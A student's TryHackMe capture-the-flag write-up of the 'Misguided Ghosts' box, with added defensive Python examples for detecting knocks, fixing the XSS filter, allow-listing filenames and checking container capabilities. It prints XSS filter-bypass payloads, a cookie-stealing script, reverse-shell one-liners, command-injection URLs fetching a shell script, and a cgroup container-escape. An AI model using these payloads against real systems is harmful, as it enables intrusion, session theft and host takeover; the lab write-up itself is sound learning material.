Misguided Ghosts CTF Tryhackme Write-up
Explore your inner daemons with this hard box!

Hey all!
I am Arunkumar R, a student trying to become a security researcher; you can find me under the username 0xarun. This is my second CTF write-up. I have been doing TryHackMe CTFs for the past few months, learned a lot of stuff, and finally finished this box!
Let's get started!

Start with an Nmap scan!

Yeah, we got 2 open ports, and FTP allows anonymous login! Let's log in with FTP!

Ahhhh, after login I found a pub directory; enter it and ls shows some text files. Get these files to the local machine!


Huehueee! The "knock knock" hint means port knocking, yeahhh! Let's try port knocking! First, install knock with this command:
apt install knockd
After installing knockd, run it like this:
knock 10.10.122.226 7864 8273 9241 12007 60753

Those are the ports I identified in Wireshark.
After doing this, scan with Nmap!
nmap -p 8080 -sC -sV 10.10.122.226

If you did the port knocking correctly, you get Nmap results like those shown above.
Let's open the webpage!
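From the defender's side, a completed knock sequence from an unexpected source is worth an alert. This added example (not part of the write-up) runs a knockd-style state machine over constructed iptables-like drop logs, using the knock sequence from this box; the log lines and the `knocking_hosts` function are my own.

```python
import re
from collections import defaultdict

# Knock sequence used on this box (from the write-up)
KNOCK_SEQUENCE = [7864, 8273, 9241, 12007, 60753]

# Constructed iptables-style drop log (not real captured data)
CONSTRUCTED_LOG = """\
kernel: DROP IN=eth0 SRC=10.9.172.114 DST=10.10.122.226 PROTO=TCP DPT=7864
kernel: DROP IN=eth0 SRC=10.9.172.114 DST=10.10.122.226 PROTO=TCP DPT=8273
kernel: DROP IN=eth0 SRC=10.9.172.114 DST=10.10.122.226 PROTO=TCP DPT=9241
kernel: DROP IN=eth0 SRC=10.9.172.114 DST=10.10.122.226 PROTO=TCP DPT=12007
kernel: DROP IN=eth0 SRC=10.9.172.114 DST=10.10.122.226 PROTO=TCP DPT=60753
kernel: DROP IN=eth0 SRC=10.9.172.200 DST=10.10.122.226 PROTO=TCP DPT=7864
kernel: DROP IN=eth0 SRC=10.9.172.200 DST=10.10.122.226 PROTO=TCP DPT=445
kernel: DROP IN=eth0 SRC=10.9.172.200 DST=10.10.122.226 PROTO=TCP DPT=8273
"""

LINE_RE = re.compile(r"SRC=(?P<src>\S+).*?DPT=(?P<dpt>\d+)")

def knocking_hosts(log_text, sequence=KNOCK_SEQUENCE):
    """Return the set of source IPs that completed the knock sequence.

    Mirrors knockd's own state machine: a hit on the next expected port
    advances the host, any other port resets it (a hit on the first port
    restarts at step one), so a scan that merely touches the ports out of
    order is not reported."""
    progress = defaultdict(int)   # src -> index of the next expected port
    completed = set()
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        src, dpt = m.group("src"), int(m.group("dpt"))
        step = progress[src]
        if dpt == sequence[step]:
            step += 1
            if step == len(sequence):
                completed.add(src)
                step = 0
        elif dpt == sequence[0]:
            step = 1
        else:
            step = 0
        progress[src] = step
    return completed
```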

Ahhh gooood, someone's singing well :P
Let's do directory brute-force with gobuster; I found the directory /login.

Here I tried to log in with usernames and passwords like paramore:paramore, josh:josh, zac:zac and so on, and I finally got in with zac:zac.
Let's log in with zac:zac

Ahhhh yeah, we're logged in! Here's a hint: "admin will check every two minutes so don't be rude!" That's a hint for XSS.
So I tried some XSS payloads like the ones below:
<script>javascript:alert(1)</script\x0B
<script charset="\x22>javascript:alert(1)</script>
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> -->
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> -->
But bad luck, these payloads didn't work :( ahhh wtf
After a while I found a working payload, given below:
<scrscriptipt> alert('xss') </scscriptript>
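Why the nested-tag payload above gets through: a filter that strips the word "script" in a single pass reassembles the tag. This added example (not the box's code; the filter is my assumption about its behaviour) shows that filter, the recursive variant, and the real fix, escaping output instead of stripping it.

```python
import html
import re

# Working payload from the write-up
PAYLOAD = "<scrscriptipt> alert('xss') </scscriptript>"

def naive_filter(user_input):
    """Assumed vulnerable behaviour: remove 'script' once, case-insensitively.
    '<scrscriptipt>' loses its inner 'script' and becomes '<script>'."""
    return re.sub(r"script", "", user_input, flags=re.IGNORECASE)

def naive_filter_recursive(user_input):
    """Strip until a fixed point is reached, so nesting no longer helps.
    Still a deny-list, so other tags and event handlers survive it."""
    while True:
        cleaned = naive_filter(user_input)
        if cleaned == user_input:
            return cleaned
        user_input = cleaned

def safe_render(user_input):
    """Encode instead of strip: the browser can never parse this as markup."""
    return html.escape(user_input, quote=True)

def contains_script_tag(rendered):
    """Check used by the tests: does the rendered HTML open a <script> tag?"""
    return re.search(r"<\s*script\b", rendered, re.IGNORECASE) is not None
```

The cookie theft in the next step works because the session cookie is readable from document.cookie; marking it HttpOnly is the matching mitigation on the cookie side.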

Yeah, popup! Now let's go for the admin's cookie. Hoooo, cookies yummyyy... let's hunt the cookies!
Run a Python listener: python -m SimpleHTTPServer 9001
I used this payload, which I got from another mate's write-up :D
<scrscriptipt> document.location='http://10.9.172.114:9001/XSS/grabber.php?c='+document.cookie </scrscriptipt>

Uhhhh, let's check out the Python listener!

Hooohooo, we got the admin's cookieeee, let's eat!
Log in with the admin's cookie by setting the session: open Inspect Element > Storage > Cookies and change that "older_cookie" value to "admin_cookie" like this:

After the change, just reload the page! Then we're logged in as admin Hayley, yeah, great! ahh
Let's move on to directory brute-force with the admin's cookie, with the help of gobuster:
gobuster dir -t 50 -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.122.226:8080 -c "admin_cookie" 2>/dev/null

Ahhh, this brute force is on fire 🔥 we got a photos directory, interesting!

This upload feature may have something interesting, go for it. I tried to upload some bash files; sadly they weren't uploaded, but luckily I found a parameter like ?image=, and with this we got code execution hooooo! ☺

With image=/etc/passwd;id the injected command executed successfully!
Now try uploading shell.sh; the code for the shell is given below:
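The ?image= parameter is being passed to a shell, which is why a ";" after the filename runs a second command. This added example (not the box's code; the photo directory and function names are my assumptions) shows a hardened handler that treats the value strictly as a filename and never touches a shell, plus a cheap log-review check that flags the injection shapes used on this page, including the $'..' quoting form.

```python
import os
import re

PHOTO_DIR = "/var/www/photos"          # assumed location of the allowed images
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.(jpg|jpeg|png|gif)$")

def resolve_image(param, photo_dir=PHOTO_DIR):
    """Return the absolute path of an allowed image, or None if rejected.

    Allow-list the name first (no '/', ';', '$', spaces), then resolve the
    path and confirm it still lies inside photo_dir; realpath defeats '..'
    and symlink tricks."""
    if not SAFE_NAME.fullmatch(param):
        return None
    base = os.path.realpath(photo_dir)
    path = os.path.realpath(os.path.join(base, param))
    if os.path.commonpath([base, path]) != base:
        return None
    return path

def looks_like_injection(param):
    """Detection signal for WAF rules or log review: shell metacharacters
    or ANSI-C $'...' quoting in a value that should be a plain filename."""
    return re.search(r"[;&|`$(){}<>\n]|\$'", param) is not None

def image_argv(param, tool="/usr/bin/file"):
    """If a helper program must be run on the file, build argv for
    subprocess.run(argv) with shell=False; '--' stops option parsing."""
    path = resolve_image(param)
    if path is None:
        raise ValueError("rejected image parameter")
    return [tool, "--", path]
```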
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.172.114 9001 >/tmp/f
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.172.114",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.172.114",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
bash -i >& /dev/tcp/10.9.172.114/9001 0>&1
Yeahh, don't forget to edit the IP. After editing, save this code as shell.sh.
After saving, run the Python listener: python -m SimpleHTTPServer
Upload that saved shell with this command:
/photos?image=/etc/passwd;CMD=$'\x20wget\x2010.6.31.213:8000/shell.sh';`$CMD`
After that, check the Python listener.

Yeahhh we made it! Shell successfully uploaded!
Then run a Netcat reverse listener:
nc -nvlp 9001
Now run shell.sh with this command:
/photos?image=/etc/passwd;CMD=$'\x20sh\x20shell.sh';`$CMD`
Let's check the Netcat listener.

Huuu got it! Yeah, time for privilege escalation.


Nothing interesting! :( Move to /home/zac/notes

Ohhh, this id_rsa is encrypted!

Haaaa, just leave this ciphertext; we go another way. Docker is running here, so next we enter some commands to get a root shell.
Run a Netcat reverse listener on the local machine:
nc -nlvp 9001
Exploit with the code given below (the cgroup release_agent technique, which needs the container to be privileged):
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo 'curl 10.6.31.213:8000/shell.sh -o /dev/shm/shell.sh' >> /cmd
echo 'chmod +x /dev/shm/shell.sh' >> /cmd
echo 'sh /dev/shm/shell.sh' >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
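The escape above only works because the container can mount cgroupfs, which needs CAP_SYS_ADMIN (what --privileged grants). This added example (not from the write-up) is a posture check a defender can run inside a container: it parses the CapEff bitmask from /proc/self/status and reports whether that precondition holds; the two status excerpts are constructed, the function names are mine.

```python
# Capability bit numbers from linux/capability.h
CAP_SYS_ADMIN = 21
CAP_SYS_PTRACE = 19
CAP_SYS_MODULE = 16
NAMES = {CAP_SYS_ADMIN: "CAP_SYS_ADMIN", CAP_SYS_PTRACE: "CAP_SYS_PTRACE",
         CAP_SYS_MODULE: "CAP_SYS_MODULE"}

# Constructed /proc/self/status excerpts: a --privileged container (all caps,
# seccomp off) and one with Docker's default capability set.
PRIVILEGED_STATUS = "Name:\tsh\nCapEff:\t0000003fffffffff\nSeccomp:\t0\n"
DEFAULT_STATUS = "Name:\tsh\nCapEff:\t00000000a80425fb\nSeccomp:\t2\n"

def parse_status(text):
    """Turn 'Key:<tab>value' lines into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def effective_caps(status):
    """CapEff is a hex bitmask; bit n set means capability n is effective."""
    return int(status.get("CapEff", "0"), 16)

def has_cap(status, bit):
    return (effective_caps(status) >> bit) & 1 == 1

def risky_caps(status):
    """Names of the dangerous capabilities present in CapEff."""
    return sorted(name for bit, name in NAMES.items() if has_cap(status, bit))

def release_agent_escape_possible(status):
    """Mounting cgroupfs and writing release_agent requires CAP_SYS_ADMIN.
    Seccomp or AppArmor may still block the mount, so this is a necessary,
    not sufficient, condition; dropping the capability removes it outright."""
    return has_cap(status, CAP_SYS_ADMIN)

def check_running_container():
    """Apply the check to the current process (run inside the container)."""
    with open("/proc/self/status") as fh:
        return release_agent_escape_possible(parse_status(fh.read()))
```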

Yeah, finally done! Check the Netcat reverse listener!

Yeah, we got rooooooooooooot


Yeahhhh, all done! Tooooo tired, tadaaaaaa
Thank you!
